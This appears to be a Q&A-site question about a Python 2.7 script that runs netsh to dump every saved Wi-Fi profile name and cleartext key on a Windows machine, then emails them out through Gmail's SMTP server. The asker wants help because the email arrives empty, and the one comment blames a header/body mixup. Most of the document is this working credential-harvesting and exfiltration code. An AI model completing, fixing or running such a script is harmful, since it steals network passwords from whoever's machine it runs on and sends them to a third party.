# sent email with python is empty

Tags: python, python-2.7, smtp, smtplib

I'm making a program that executes a windows command showing the saved wifi passwords on current system and emails the result but evey time i run the program the email it sends is empty

```
#!/usr/bin/env python

import subprocess
import smtplib
import re


def get_name(regex, string):
    names_list = re.findall(regex, string)
    return_list = ""
    for name in names_list:
        return_list = return_list + name
    return return_list


def get_password(regex, string):
    password_list = re.findall(regex, string)
    return_list = ""
    for password in password_list:
        return_list = return_list + password
    return return_list


def send_mail(email, password, message):
        server = smtplib.SMTP("smtp.gmail.com", 587)
        server.starttls()
        server.login(email, password)
        # Crafts and sends email .sendmail(from, to, content)
        server.sendmail(email, email, message)
        server.quit()


command = "netsh wlan show profile"
networks = subprocess.check_output(command, shell=True)
network_names_list = re.findall("(?:Profile\s*:\s)(.*)", networks)

result = ""
for network_name in network_names_list:
    command = "netsh wlan show profile " + network_name + " key=clear"
    current_result = subprocess.check_output(command, shell=True)
    names_list = get_name("(?:Name\s*:\s)(.*)", current_result)
    #print(names_list)
    password_list = get_password( "(?:Key Content\s.*:\s)(.*)", 
                                   current_result)
    #print(password_list)
    result = result + "Names: " + names_list + " Passwords: " + 
             password_list 

#print(result)
send_mail(email, password, result)
```

the last commented `print()` shows the wifi name and password stored in the `result` variable, but when i pass `result` in the `send_mail()` function the email i receive is empty

edit: When i try `result = result + "Names: " + names_list + password_list` it omits adding the `names_list` variable and only send an email containing the `password_list` variable, i would like for the email to read `Name: names_list password: password_list` with the names and passwords on different lines

Comment: That's probably due to a mixup between the email's body and its headers. Check this SO question: https://stackoverflow.com/questions/11796664/smtplib-sends-blank-message-if-the-message-contain-certain-characters